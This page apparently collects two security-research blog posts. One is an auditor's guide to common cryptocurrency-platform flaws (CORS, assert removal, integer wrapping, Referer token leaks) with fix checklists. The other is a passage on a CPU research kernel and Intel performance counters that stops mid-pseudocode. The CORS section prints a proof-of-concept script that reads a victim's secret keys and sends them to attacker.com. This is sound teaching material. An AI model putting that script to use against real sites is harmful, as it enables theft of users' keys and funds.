Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

Lessons in auditing cryptocurrency wallets, systems, and infrastructures

31 July 2019 at 22:00

In the past three years, Doyensec has been providing security testing services for some of the global brands in the cryptocurrency world. We have audited desktop and mobile wallets, exchanges web interfaces, custody systems, and backbone infrastructure components.

We have seen many things done right, but also discovered many design and implementation vulnerabilities. Failure is a great lesson in security and can always be turned into positive teaching for the future. Learning from past mistakes is the key to create better systems.

Vulnerability Impact

In this article, we will guide you through a selection of four simple (yet dangerous!) application vulnerabilities.

Breaking Crypto Currency Systems != Breaking Crypto (at least not always)

For that, you would probably need to wait for Jean-Philippe Aumasson’s talk at the upcoming BlackHat Vegas.

This blog post was brought to you by Kevin Joensen and Mateusz Swidniak.

1) CORS Misconfigurations

Cross-Origin Resource Sharing is used for relaxing the Same Origin Policy. This mechanism enables communication between websites hosted on different domains. A misconfigured CORS can have a great impact on the website security posture as other sites might access the page content.

Imagine a website with the following HTTP response headers:

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

If an attacker has successfully lured a victim to their website, they can easily issue an HTTP request with a null origin using an iframe tag and a sandbox attribute.

<iframe sandbox="allow-scripts" src="https://attacker.com/corsbug" />
<html>
<body>
<script>
var req = new XMLHttpRequest();
req.onload = callback;
req.open('GET', 'https://bitcoinbank/keys', true);
req.withCredentials = true;
req.send();

function callback() {
    location='https://attacker.com/?dump='+this.responseText;
};
</script>
</body>

When the victim visits the crafted page, the attacker can perform a request to https://bitcoinbank/keys and retrieve their secret keys.

This can also happen when the Access-Control-Allow-Origin response header is dynamically updated to the same domain as specified by the Origin request header.

References:

Checklist:

  • Ensure that your Access-Control-Allow-Origin is never set to null
  • Ensure that Access-Control-Allow-Origin is not taken from a user-controlled variable or header
  • Ensure that you are not dynamically copying the value of the Origin HTTP header into Access-Control-Allow-Origin

2) Asserts and Compilers

In some programming languages, optimizations performed by the compiler can have undesirable results. This could manifest in many different quirks due to specific compiler or language behaviors, however there is a specific class of idiosyncrasies that can have devastating effects.

Let’s consider this Python code as an example:

# All deposits should belong to the same CRYPTO address
assert all([x.deposit_address == address for x in deposits])

At first sight, there is nothing wrong with this code. Yet, there is actually a quite severe bug. The problem is that Python runs with __debug__ by default. This allows for assert statements like the security control illustrated above. When the code gets compiled to optimized byte code (*.pyo files) and lands into production, all asserts are gone. As a result, the application will not enforce any security checks.

Similar behaviors exist in many languages and with different compiler options, including C/C++, Swift, Closure and many more.

For example, let’s consider the following Swift code:

// No assert if password is == mysecret
if (password != "mysecretpw") {
   assertionFailure("Password not correct!")
}

If you were to run this code in Xcode, then it would simply hit your assertionFailure in case of an incorrect password. This is because Xcode compiles the application without any optimizations using the -Onone flag. If you were to build the same code for the Apple Store instead, the check would be optimized out leading to no password check at all since the execution will continue. Note that there are many things wrong in those three lines of code.

Talking about assertions, PHP takes the first place and de-facto facilitates RCE when you run asserts with a string argument. This is due to the argument getting evaluated through the standard eval.

References:

Checklist:

  • Do not use assert statements for guarding code and enforcing security checks
  • Research for compiler optimizations gotchas in the language you use

3) Arithmetic Errors

A bug class that is also easy to overlook in fin-tech systems pertains to arithmetic operations. Negative numbers and overflows can create money out of thin air.

For example, let’s consider a withdrawal function that looks for the amount of money in a certain wallet. Being able to pass a negative number could be abused to generate money for that account.

Imagine the following example code:

if data["wallet"].balance < data["amount"]:
    error_dict["wallet_balance"] = ("Withdrawal exceeds available balance")
...    
data["wallet"].balance = data["wallet"].balance - data["amount"]

The if statement correctly checks if the balance is higher than the requested amount. However, the code does not enforce the use of a positive number.

Let’s try with -100 coins in a wallet account having 200 coins.

The check would be satisfied and the code responsible for updating the amount would look like the following:

data["wallet"].balance = 200 - (-100) # 300 coins

This would enable an attacker to get free money out of the system.

Talking about numbers and arithmetic, there are also well-known bugs affecting lower-level languages in which signed vs unsigned types come to play.

In most architectures, a signed short integer is a 2 bytes type that can hold a negative number and a positive number. In memory, positive numbers are represented as 1 == 0x0001, 2 == 0x0002 and so forth. Instead, negative numbers are represented as two’s complement -1 == 0xffff,-2 == 0xfffe and so forth. These representations meet on 0x7fff, which enables a signed integer to hold a value between -32768 and 32767.

Let’s take a look at an example with pseudo-code:

signed short int bank_account = -30000

Assuming the system still allows withdrawals (e.g. perhaps a loan), the following code will be exercised:

int withdraw(signed short int money){
    bank_account -= money
}

As we know, the max negative value is -32768. What happens if a user withdraws 2768 + 1 ?

withdraw(2769); //32767

Yes! No longer in debt thanks to integer wrapping. Current balance is now 32767.

References:

Checklist:

  • Verify that the transaction systems and other components dealing with financial arithmetic do not accept negative numbers
  • Verify integer boundaries, and whether correct signed vs unsigned types are used across the entire codebase. Note that the signed integer overflow is considered undefined behavior.

4) Password Reset Token Leakage Via Referer

Last but not least, we would like to introduce a simple infoleak bug. This is a very widespread issue present in the password reset mechanism of many web platforms.

Vulnerability Impact

A standard procedure for a password reset in modern web applications involves the use of a secret link sent out to the user via email. The secret is used as an authentication token to prove that the recipient had access to the email associated with the user’s registration.

Those links typically take the form of https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320 or https://example.com/passwordreset?token=2a8c5d7e-5c2c-4ea6-9894-b18436ea5320.

But what actually happens when the user clicks the link?

When a web browser requests a resource, it typically adds an HTTP header, called the Referer header indicating the URL of the resource from which the request originated. If the resource being requested resides on a different domain, the Referer header is still generally included in the cross-domain request. It is not uncommon that the password reset page loads external JavaScript resources such as libraries and tracking code. Under those circumstances, the password reset token will be also sent to the 3rd-party domains.

GET /libs/jquery.js HTTP/1.1
Host: 3rdpartyexampledomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Referer: https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320
Connection: close

As a result, personnel working for the affected 3rd-party domains and having access to the web server access logs might be able to take over accounts of the vulnerable web platform.

References:

Checklist:

  • If possible, applications should never transmit any sensitive information within the URL query string
  • In case of password reset links, the Referer header should always be removed using one of the following techniques:
    • Blank landing page under the web platform domain, followed by a redirect
    • Originate the navigation from a pseudo-URL document, such as data: or javascript:
    • Using <iframe src=about:blank>
    • Using <meta name="referrer" content="no-referrer" />
    • Setting an appropriate Referrer-Policy header, assuming your application supports recent browsers only

If you would like to talk about securing your platform, contact us at [email protected]!

Sushi Roll: A CPU research kernel with minimal noise for cycle-by-cycle micro-architectural introspection

19 August 2019 at 07:11

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!

Summary

In this blog we’re going to go into details about a CPU research kernel I’ve developed: Sushi Roll. This kernel uses multiple creative techniques to measure undefined behavior on Intel micro-architectures. Sushi Roll is designed to have minimal noise such that tiny micro-architectural events can be measured, such as speculative execution and cache-coherency behavior. With creative use of performance counters we’re able to accurately plot micro-architectural activity on a graph with an x-axis in cycles.

We’ll go a lot more into detail about what everything in this graph means later in the blog, but here’s a simple example of just some of the data we can collect:

Example uarch activity Example cycle-by-cycle profiling of the Kaby Lake micro-architecture, warning: log-scale y-axis

Agenda

This is a relatively long blog and will be split into 4 major sections.

  • The gears that turn in your CPU: A high-level explanation of modern Intel micro-architectures
  • Sushi Roll: The design of the low-noise research kernel
  • Cycle-by-cycle micro-architectural introspection: A unique usage of performance counters to observe cycle-by-cycle micro-architectural behaviors
  • Results: Putting the pieces together and making graphs of cool micro-architectural behavior

Why?

In the past year I’ve spent a decent amount of time doing CPU vulnerability research. I’ve written proof-of-concept exploits for nearly every CPU vulnerability, from many attacker perspectives (user leaking kernel, user/kernel leaking hypervisor, guest leaking other guest, etc). These exploits allowed us to provide developers and researchers with real-world attacks to verify mitigations.

CPU research happens to be an overlap of my two primary research interests: vulnerability research and high-performance kernel development. I joined Microsoft in the early winter of 2017 and this lined up pretty closely with the public release of the Meltdown and Spectre CPU attacks. As I didn’t yet have much on my plate, the idea was floated that I could look into some of the CPU vulnerabilities. I got pretty lucky with this timing, as I ended up really enjoying the work and ended up sinking most of my free time into it.

My workflow for research often starts with writing some custom tools for measuring and analysis of a given target. Whether the target is a web browser, PDF parser, remote attack surface, or a CPU, I’ve often found that the best thing you can do is just make something new. Try out some new attack surface, write a targeted fuzzer for a specific feature, etc. Doing something new doesn’t have to be better or more difficult than something that was done before, as often there are completely unexplored surfaces out there. My specialty is introspection. I find unique ways to measure behaviors, which then fuels the idea pool for code auditing or fuzzer development.

This leads to an interesting situation in CPU research… it’s largely blind. Lots of the current CPU research is done based on writing snippets of code and reviewing the overall side-effects of it (via cache timing, performance counters, etc). These overall side-effects may also include noise from other processor activity, from the OS task switching processes, other cores changing the MESI-state of cache lines, etc. I happened to already have a low-noise no-shared-memory research kernel that I developed for vectorized emulation on Xeon Phis! This lead to a really good starting point for throwing in some performance counters and measuring CPU behaviors… and the results were a bit better than expected.

TL;DR: I enjoy writing tools to measure things, so I wrote a tool to measure undefined CPU behavior.


The gears that turn in your CPU

Feel free to skip this section entirely if you’re familiar with modern processor architecture

Your modern Intel CPU is a fairly complex beast when you care about every technical detail, but lets look at it from a higher level. Here’s what the micro-architecture (uArch) looks like in a modern Intel Skylake processor.

Skylake diagram Skylake uArch diagram, Diagram from WikiChip

There are 3 main components: The front end, which converts complex x86 instructions into groups of micro-operations. The execution engine, which executes the micro-operations. And the memory subsystem, which makes sure that the processor is able to get streams of instructions and data.


Front End

The front end covers almost everything related to figuring out which micro-operations (uops) need to be dispatched to the execution engine in order to accomplish a task. The execution engine on a modern Intel processor does not directly execute x86 instructions, rather these instructions are converted to these micro-operations which are fixed in size and specific to the processor micro-architecture.

Instruction fetch and cache

There’s a lot that happens prior to the actual execution of an instruction. First, the memory containing the instruction is read into the L1 instruction cache, ideally brought in from the L2 cache as to minimize delay. At this point the instruction is still a macro-op (a variable-length x86 instruction), which is quite a pain to work with. The processor still doesn’t know how large the instruction is, so during pre-decode the processor will do an initial length decode to determine the instruction boundaries.

At this point the instruction has been chopped up and is ready for the instruction queue!

Instruction Queue and Macro Fusion

Instructions that come in for execution might be quite simple, and could potentially be “fused” into a complex operation. This stage is not publicly documented, but we know that a very common fusion is combining compare instructions with conditional branches. This allows a common instruction pattern like:

cmp rax, 5
jne .offset

To be combined into a single macro-op with the same semantics. This complex fused operation now only takes up one slot in many parts of the CPU pipeline, rather than two, freeing up more resources to other operations.

Decode

Instruction decode is where the x86 macro-ops get converted into micro-ops. These micro-ops vary heavily by uArch, and allow Intel to regularly change fundamentals in their processors without affecting backwards compatibility with the x86 architecture. There’s a lot of magic that happens in the decoder, but mostly what matters is that the variable-length macro-ops get converted into the fixed-length micro-ops. There are multiple ways that this conversion happens. Instructions might directly convert to uops, and this is the common path for most x86 instructions. However, some instructions, or even processor conditions, may cause something called microcode to get executed.

Microcode

Some instructions in x86 trigger microcode to be used. Microcode is effectively a tiny collection of uops which will be executed on certain conditions. Think of this like a C/C++ macro, where you can have a one-liner for something that expands to much more. When an operation does something that requires microcode, the microcode ROM is accessed and the uops it specifies are placed into the pipeline. These are often complex operations, like switching operating modes, reading/writing internal CPU registers, etc. This microcode ROM also gives Intel an opportunity to make changes to instruction behaviors entirely with a microcode patch.

uop Cache

There’s also a uop cache which allows previously decoded instructions to skip the entire pre-decode and decode process. Like standard memory caching, this provides a huge speedup and dramatically reduces bottlenecks in the front-end.

Allocation Queue

The allocation queue is responsible for holding a bunch of uops which need to be executed. These are then fed to the execution engine when the execution engine has resources available to execute them.


Execution engine

The execution engine does exactly what you would expect: it executes things. But at this stage your processor starts moving your instructions around to speed things up.

Things start to get a bit complex at this point, click for details!

Renaming / Allocating / Retirement

Resources need to be allocated for certain operations. There are a lot more registers in the processor than the standard x86 registers. These registers are allocated out for temporary operations, and often mapped onto their corresponding x86 registers.

There are a lot of optimizations the CPU can do at this stage. It can eliminate register moves by aliasing registers (such that two x86 registers “point to” the same internal register). It can remove known zeroing instructions (like xor with self, or and with zero) from the pipeline, and just zero the registers directly. These optimizations are frequently improved each generation.

Finally, when instructions have completed successfully, they are retired. This retirement commits the internal micro-architectural state back out to the x86 architectural state. It’s also when memory operations become visible to other CPUs.

Re-ordering

uOP re-ordering is important to modern CPU performance. Future instructions which do not depend on the current instruction, could execute while waiting for the results of the current one.

For example:

mov rax, [rax]
add rbx, rcx

In this short example we see that we perform a 64-bit load from the address in rax and store it back into rax. Memory operations can be quite expensive, ranging from 4 cycles for a L1 cache hit, to 250 cycles and beyond for an off-processor memory access.

The processor is able to realize that the add rbx, rcx instruction does not need to “wait” for the result of the load, and can send off the add uop for execution while waiting for the load to complete.

This is where things can start to get weird. The processor starts to perform operations in a different order than what you told it to. The processor then holds the results and makes sure they “appear” to other cores in the correct order, as x86 is a strongly-ordered architecture. Other architectures like ARM are typically weakly-ordered, and it’s up to the developer to insert fences in the instruction stream to tell the processor the specific order operations need to complete in. This ordering is not an issue on a single core, but it may affect the way another core observes the memory transactions you perform.

For example:

Core 0 executes the following:

mov [shared_memory.pointer], rax ; Store the pointer in `rax` to shared memory
mov [shared_memory.owned],   0   ; Mark that we no longer own the shared memory

Core 1 executes the following:

.try_again:
    cmp [shared_memory.owned], 0 ; Check if someone owns this memory
    jne .try_again               ; Someone owns this memory, wait a bit longer

    mov rax, [shared_memory.pointer] ; Get the pointer
    mov rax, [rax]                   ; Read from the pointer

On x86 this is safe, as all aligned loads and stores are atomic, and are commit in a way that they appear in-order to all other processors. On something like ARM the owned value could be written to prior to pointer being written, allowing core 1 to use a stale/invalid pointer.

Execution Units

Finally we got to an easy part: the execution units. This is the silicon that is responsible for actually performing maths, loads, and stores. The core has multiple copies of this hardware logic for some of the common operations, which allows the same operation to be performed in parallel on separate data. For example, an add can be performed on 4 different execution units.

For things like loads, there are 2 load ports (port 2 and port 3), this allows 2 independent loads to be executed per cycle. Stores on the other hand, only have one port (port 4), and thus the core can only perform one store per cycle.


Memory subsystem

The memory subsystem on Intel is pretty complex, but we’re only going to go into the basics.

Caches

Caches are critical to modern CPU performance. RAM latency is so high (150-250 cycles) that a CPU is largely unusable without a cache. For example, if a modern x86 processor at 2.2 GHz had all caches disabled, it would never be able to execute more than ~15 million instructions per second. That’s as slow as an Intel 80486 from 1991.

When working on my first hypervisor I actually disabled all caching by mistake, and Windows took multiple hours to boot. It’s pretty incredible how important caches are.

For x86 there are typically 3 levels of cache: A level 1 cache, which is extremely fast, but small: 4 cycles latency. Followed by a level 2 cache, which is much larger, but still quite small: 14 cycles latency. Finally there’s the last-level-cache (LLC, typically the L3 cache), this is quite large, but has a higher latency: ~60 cycles.

The L1 and L2 caches are present in each core, however, the L3 cache is shared between multiple cores.

Translation Lookaside Buffers (TLBs)

In modern CPUs, applications almost never interface with physical memory directly. Rather they go through address translation to convert virtual addresses to physical addresses. This allows contiguous virtual memory regions to map to fragmented physical memory. Performing this translation requires 4 memory accesses (on 64-bit 4-level paging), and is quite expensive. Thus the CPU caches recently translated addresses such that it can skip this translation process during memory operations.

It is up to the OS to tell the CPU when to flush these TLBs via an invalidate page, invlpg instruction. If the OS doesn’t correctly invlpg memory when mappings change, it’s possible to use stale translation information.

Line fill buffers

While a load is pending, and not yet present in L1 cache, the data lives in a line fill buffer. The line fill buffers live between L2 cache and your L1 cache. When a memory access misses L1 cache, a line fill buffer entry is allocated, and once the load completes, the LFB is copied into the L1 cache and the LFB entry is discarded.

Store buffer

Store buffers are similar to line fill buffers. While waiting for resources to be available for a store to complete, it is placed into a store buffer. This allows for up to 56 stores (on Skylake) to be queued up, even if all other aspects of the memory subsystem are currently busy, or stores are not ready to be retired.

Further, loads which access memory will query the store buffers to potentially bypass the cache. If a read occurs on a recently stored location, the read could directly be filled from the store buffers. This is called store forwarding.

Load buffers

Similar to store buffers, load buffers are used for pending load uops. This sits between your execution units and L1 cache. This can hold up to 72 entries on Skylake.

CPU architecture summary and more info

That was a pretty high level introduction to many of the aspects of modern Intel CPU architecture. Every component of this diagram could have an entire blog written on it. Intel Manuals, WikiChip, Agner Fog’s CPU documentation, and many more, provide a more thorough documentation of Intel micro-architecture.


Sushi Roll

Sushi Roll is one of my favorite kernels! It wasn’t originally designed for CPU introspection, but it had some neat features which made it much more suitable for CPU research than my other kernels. We’ll talk a bit about why this kernel exists, and then talk about why it quickly became my go-to kernel for CPU research.

Kernel mascot: Squishble Sushi Roll

A primer on Knights Landing

Sushi Roll was originally designed for my Vectorized Emulation work. Vectorized emulation was designed for the Intel Xeon Phi (Knights Landing), which is a pretty strange architecture. Even though it’s fully-featured traditional x86, standard software will “just work” on it, it is quite slow per individual thread. First of all, the clock rates are ~1.3 GHz, so there alone it’s about 2-3x slower than a “standard” x86 processor. Even further, it has fewer CPU resources for re-ordering and instruction decode. All-in-all the CPU is about 10x slower when running a single-threaded application compared to a “standard” 3 GHz modern Intel CPU. There’s also no L3 cache, so memory accesses can become much more expensive.

On top of these simple performance issues, there are more complex issues due to 4-way hyperthreading. Knights Landing was designed to be 4-way hyperthreaded (4 threads per core) to alleviate some of the performance losses of the limited instruction decode and caching. This allows threads to “block” on memory accesses while other threads with pending computations use the execution units. This 4-way hyperthreading, combined with 64-core processors, leads to 256 hardware threads showing up to your OS as cores.

Migrating processes and resources between these threads can be catastrophically slow. Standard shared-memory models also start to fall apart at this level of scaling (without specialized tuning). For example: If all 256 threads are hammering the same memory by performing an atomic increment (lock inc instruction), each individual increment will start to cost over 10,000 cycles! This is enough time for a single core on the Xeon Phi to do 640,000 single-precision floating point operations… just from a single increment! While most software treats atomics as “free locks”, they start to cause some serious cache-coherency pollution when scaled out this wide.

Obviously with some careful development you can mitigate these issues by decreasing the frequency of shared memory accesses. But perhaps we can develop a kernel that fundamentally disallows this behavior, preventing a developer from ever starting to go down the wrong path!

The original intent of Sushi Roll

Sushi Roll was designed from the start to be a massively parallel message-passing based kernel. The most notable feature of Sushi Roll is that there is no mutable shared memory allowed (a tiny exception made for the core IPC mechanism). This means that if you ever want to share information with another processor, you must pass that information via IPC. Shared immutable memory however, is allowed, as this doesn’t cause cache coherency traffic.

This design also meant that a lock never needed to be held, even atomic-level locks using the lock prefix. Rather than using locks, a specific core would own a hardware resource. For example, core #0 may own the network card, or a specific queue on the network card. Instead of requesting exclusive access to the NIC by obtaining a lock, you would send a message to core #0, indicating that you want to send a packet. All of the processing of these packets is done by the sender, thus the data is already formatted in a way that can be directly dropped into the NIC ring buffers. This made the owner of a hardware resource simply a mediator, reducing the latency to that resource.

While this makes the internals of the kernel a bit more complex, the programming model that a developer sees is still a standard send()/recv() model. By forcing message-passing, this ensured that all software written for this kernel could be scaled between multiple machines with no modification. On a single computer there is a fast, low-latency IPC mechanism that leverages some of the abilities to share memory (by transferring ownership of physical memory to the receiver). If the target for a message resided on another computer on the network, then the message would be serialized in a way that could be sent over the network. This complexity is yet again hidden from the developer, which allows for one program to be made that is scaled out without any extra effort.

No interrupts, no timers, no software threads, no processes

Sushi Roll follows a similar model to most of my other kernels. It has no interrupts, no timers, no software threads, and no processes. These are typically required for traditional operating systems, as to provide a user experience with multiple processes and users. However, my kernels are always designed for one purpose. This means the kernel boots up, and just does a given task on all cores (sometimes with one or two cores having a “special” responsibility).

By removing all of these external events, the CPU behaves a lot more deterministically. Sushi Roll goes the extra mile here, as it further reduces CPU noise by not having cores sharing memory and causing unexpected cache evictions or coherency traffic.

Soft Reboots

Similar to kexec on Linux, my kernels always support soft rebooting. This allows the old kernel (even a double faulted/corrupted kernel) to be replaced by a new kernel. This process takes about 200-300ms to tear down the old kernel, download the new one over PXE, and run the new one. This makes it feasible to have such a specialized kernel without processes, since I can just change the code of the kernel and boot up the new one in under a second. Rapid prototyping is crucial to fast development, and without this feature this kernel would be unusable.

Sushi Roll conclusion

Sushi Roll ended up being the perfect kernel for CPU introspection. It’s the lowest noise kernel I’ve ever developed, and it happened to also be my flagship kernel right as Spectre and Meltdown came out. By not having processes, threads, or interrupts, the CPU behaves much more deterministically than in a traditional OS.


Performance Counters

Before we get into how we got cycle-by-cycle micro-architectural data, we must learn a little bit about the performance monitoring available on Intel CPUs! This information can be explored in depth in the Intel System Developer Manual Volume 3b (note that the combined volume 3 manual doesn’t go into as much detail as the specific sub-volume manual).

Performance Counter Manual

Intel CPUs have a performance monitoring subsystem relying largely on a set of model-specific-registers (MSRs). These MSRs can be configured to track certain architectural events, typically by counting them. These counters are formally “performance monitoring counters”, often referred to as “performance counters” or PMCs.

These PMCs vary by micro-architecture. However, over time Intel has committed to offering a small subset of counters between multiple micro-architectures. These are called architectural performance counters. The version of these architectural performance counters are found in CPUID.0AH:EAX[7:0]. As of this writing there are 4 versions of architectural performance monitoring. The latest version provides a decent amount of generic information useful to general-purpose optimization. However, for a specific micro-architecture, the possibilities of performance events to track are almost limitless.

Basic usage of performance counters

To use the performance counters on Intel there are a few steps involved. First you must find a performance event you want to monitor. This information is found in per-micro-architecture tables found in the Intel Manual Volume 3b “Performance-Monitoring Events” chapter.

For example, here’s a very small selection of Skylake-specific performance events:

Skylake Events

Intel performance counters largely rely on two banks of MSRs. The performance event selection MSRs, where the different events are programmed using the umask and event numbers from the table above. And the performance counter MSRs which hold the counts themselves.

The performance event selection MSRs (IA32_PERFEVTSELx) start at address 0x186 and span a contiguous MSR region. The layout of these event selection MSRs varies slightly by micro-architecture. The number of counters available varies by CPU and is dynamically checked by reading CPUID.0AH:EAX[15:8]. The performance counter MSRs (IA32_PMCx) start at address 0xc1 and also span a contiguous MSR region. The counters have an micro-architecture-specific number of bits they support, found in CPUID.0AH:EAX[23:16]. Reading and writing these MSRs is done via the rdmsr and wrmsr instructions respectively.

Typically modern Intel processors support 4 PMCs, and thus will have 4 event selection MSRs (0x186, 0x187, 0x188, and 0x189) and 4 counter MSRs (0xc1, 0xc2, 0xc3, and 0xc4). Most processors have 48-bit performance counters. It’s important to dynamically detect this information!

Here’s what the IA32_PERFEVTSELx MSR looks like for PMC version 3:

Performance Event Selection

Field Meaning
Event Select Holds the event number from the event tables, for the event you are interested in
Unit Mask Holds the umask value from the event tables, for the event you are interested in
USR If set, this counter counts during user-land code execution (ring level != 0)
OS If set, this counter counts during OS execution (ring level == 0)
E If set, enables edge detection of the event being tracked. Counts de-asserted to asserted transitions, which allows for timing of events
PC Pin control allows for some hardware monitoring of events, like… the actual pins on the CPU
INT Generate an interrupt through the APIC if an overflow occurs of the (usually 48-bit) counter
ANY Increment the performance event when any hardware thread on a given physical core triggers the event, otherwise it only increments for a single logical thread
EN Enable the counter
INV Invert the counter mask, which changes the meaning of the CMASK field from a >= comparison (if this bit is 0), to a < comparison (if this bit is 1)
CMASK If non-zero, the CPU only increments the performance counter when the event is triggered >= (or < if INV is set) CMASK times in a single cycle. This is useful for filtering events to more specific situations. If zero, this has no effect and the counter is incremented for each event

And that’s about it! Find the right event you want to track in your specific micro-architecture’s table, program it in one of the IA32_PERFEVTSELx registers with the correct event number and umask, set the USR and/or OS bits depending on what type of code you want to track, and set the E bit to enable it! Now the corresponding IA32_PMCx counter will be incrementing every time that event occurs!

Reading the PMC counts faster

Instead of performing a rdmsr instruction to read the IA32_PMCx values, instead a rdpmc instruction can be used. This instruction is optimized to be a little bit faster and supports a “fast read mode” if ecx[31] is set to 1. This is typically how you’d read the performance counters.

Performance Counters version 2

In the second version of performance counters, Intel added a bunch of new features.

Intel added some fixed performance counters (IA32_FIXED_CTR0 through IA32_FIXED_CTR2, starting at address 0x309) which are not programmable. These are configured by IA32_FIXED_CTR_CTRL at address 0x38d. Unlike normal PMCs, these cannot be programmed to count any event. Rather the controls for these only allows the selection of which CPU ring level they increment at (or none to disable it), and whether or not they trigger an interrupt on overflow. No other control is provided for these.

Fixed Performance Counter MSR Meaning
IA32_FIXED_CTR0 0x309 Counts number of retired instructions
IA32_FIXED_CTR1 0x30a Counts number of core cycles while the processor is not halted
IA32_FIXED_CTR2 0x30b Counts number of timestamp counts (TSC) while the processor is not halted

These are then enabled and disabled by:

Fixed Counter Control

The second version of performance counters also added 3 new MSRs that allow “bulk management” of performance counters. Rather than checking the status and enabling/disabling each performance counter individually, Intel added 3 global control MSRs. These are IA32_PERF_GLOBAL_CTRL (address 0x38f) which allows enabling and disabling performance counters in bulk. IA32_PERF_GLOBAL_STATUS (address 0x38e) which allows checking the overflow status of all performance counters in one rdmsr. And IA32_PERF_GLOBAL_OVF_CTRL (address 0x390) which allows for resetting the overflow status of all performance counters in one wrmsr. Since rdmsr and wrmsr are serializing instructions, these can be quite expensive and being able to reduce the amount of them is important!

Global control (simple, allows masking of individual counters from one MSR):

Performance Global Control

Status (tracks overflows of various counters, with a global condition changed tracker):

Performance Global Status

Status control (writing a 1 to any of these bits clears the corresponding bit in IA32_PERF_GLOBAL_STATUS):

Performance Global Status

Finally, Intel added 2 bits to the existing IA32_DEBUGCTL MSR (address 0x1d9). These 2 bits Freeze_LBR_On_PMI (bit 11) and Freeze_PerfMon_On_PMI (bit 12) allow freezing of last branch recording (LBR) and performance monitoring on performance monitor interrupts (often due to overflows). These are designed to reduce the measurement of the interrupt itself when an overflow condition occurs.

Performance Counters version 3

Performance counters version 3 was pretty simple. Intel added the ANY bit to IA32_PERFEVTSELx and IA32_FIXED_CTR_CTRL to allow tracking of performance events on any thread on a physical core. Further, the performance counters went from a fixed number of 2 counters, to a variable amount of counters. This resulted in more bits being added to the global status, overflow, and overflow control MSRs, to control the corresponding counters.

Performance Global Status

Performance Counters version 4

Performance counters version 4 is pretty complex in detail, but ultimately it’s fairly simple. Intel renamed some of the MSRs (for example IA32_PERF_GLOBAL_OVF_CTRL became IA32_PERF_GLOBAL_STATUS_RESET). Intel also added a new MSR IA32_PERF_GLOBAL_STATUS_SET (address 0x391) which instead of clearing the bits in IA32_PERF_GLOBAL_STATUS, allows for setting of the bits.

Further, the freezing behavior enabled by IA32_DEBUGCTL.Freeze_LBR_On_PMI and IA32_DEBUGCTL.Freeze_PerfMon_On_PMI was streamlined to have a single bit which tracks the “freeze” state of the PMCs, rather than clearing the corresponding bits in the IA32_PERF_GLOBAL_CTRL MSR. This change is awesome as it reduces the cost of freezing and unfreezing the performance monitoring unit (PMU), but it’s actually a breaking change from previous versions of performance counters.

Finally, they added a mechanism to allow sharing of performance counters between multiple users. This is not really relevant to anything we’re going to talk about, so we won’t go into details.

Conclusion

Performance counters started off pretty simple, but Intel added more and more features over time. However, these “new” features are critical to what we’re about to do next :)


Cycle-by-cycle micro-architectural sampling

Now that we’ve gotten some prerequisites out of the way, lets talk about the main course of this blog: A creative use of performance counters to get cycle-by-cycle micro-architectural information out of Intel CPUs!

It’s important to note that this technique is meant to assist in finding and learning things about CPUs. The data it generates is not particularly easy to interpret or work with, and there are many pitfalls to be aware of!

The Goal

Performance counters are incredibly useful in categorizing micro-architectural behavior on an Intel CPU. However, these counters are often used on a block or whole program entirely, and viewed as a single data point over the whole run. For example, one might use performance counters to track the number of times there’s a cache miss in their program under test. This will give a single number as an output, giving an indication of how many times the cache was missed, but it doesn’t help much in telling you when they occurred. By some binary searching (or creative use of counter overflows) you can get a general idea of when the event occurred, but I wanted more information.

More specifically, I wanted to view micro-architectural data on a graph, where the x-axis was in cycles. This would allow me to see (with cycle-level granularity) when certain events happened in the CPU.

The Idea

We’ve set a pretty lofty goal for ourselves. We effectively want to link two performance counters with each other. In this case we want to use an arbitrary performance counter for some event we’re interested in, and we want to link it to a performance counter tracking the number of cycles elapsed. However, there doesn’t seem to be a direct way to perform this linking.

We know that we can have multiple performance counters, so we can configure one to count a given event, and another to count cycles. However, in this case we’re not able to capture information at each cycle, as we have no way of reading these counters together. We also cannot stop the counters ourselves, as stopping the counters requires injecting a wrmsr instruction which cannot be done on an arbitrary cycle boundary, and definitely cannot be done during speculation.

But there’s a small little trick we can use. We can stop multiple performance counters at the same time by using the IA32_DEBUGCTL.Freeze_PerfMon_On_PMI feature. When a counter ends up overflowing, an interrupt occurs (if configured as such). When this overflow occurs, the freeze bit in IA32_PERF_GLOBAL_STATUS is set (version 4 PMCs specific feature), causing all performance counters to stop.

This means that if we can cause an overflow on each cycle boundary, we could potentially capture the time and the event we’re interested in at the same time. Doing this isn’t too difficult either, we can simply pre-program the performance counter value IA32_PMCx to N away from overflow. In our specific case, we’re dealing with a 48-bit performance counter. So in theory if we program PMC0 to count number of cycles, set the counter to 2^48 - N where N is >= 1, we can get an interrupt, and thus an “atomic” disabling of performance counters after N cycles.

If we set up a deterministic enough execution environment, we can run the same code over and over, while adjusting N to sample the code at a different cycle count.

This relies on a lot of assumptions. We’re assuming that the freeze bit ends up disabling both performance counters at the same time (“atomically”), we’re assuming we can cause this interrupt on an arbitrary cycle boundary (even during multi-cycle instructions), and we also are assuming that we can execute code in a clean enough environment where we can do multiple runs measuring different cycle offsets.

So… lets try it!

The Implementation

A simple pseudo-code implementation of this sampling method looks as such:

/// Number of times we want to sample each data point. This allows us to look
/// for the minimum, maximum, and average values. This also gives us a way to
/// verify that the environment we're in is deterministic and the results are
/// sane. If minimum == maximum over many samples, it's safe to say we have a
/// very clear picture of what is happening.
const NUM_SAMPLES: u64 = 1000;

/// Maximum number of cycles to sample on the x-axis. This limits the sampling
/// space.
const MAX_CYCLES: u64 = 1000;

// Program the APIC to map the performance counter overflow interrupts to a
// stub assembly routine which simply `iret`s out
configure_pmc_interrupts_in_apic();

// Configure performance counters to freeze on interrupts
perf_freeze_on_overflow();

// Iterate through each performance counter we want to gather data on
for perf_counter in performance_counters_of_interest {
    // Disable and reset all performance counters individually
    // Clearing their counts to 0, and clearing their event select MSRs to 0
    disable_all_perf_counters();

    // Disable performance counters globally by setting IA32_PERF_GLOBAL_CTRL
    // to 0
    disable_perf_globally();

    // Enable a performance counter (lets say PMC0) to track the `perf_counter`
    // we're interested in. Note that this doesn't start the counter yet, as we
    // still have the counters globally disabled.
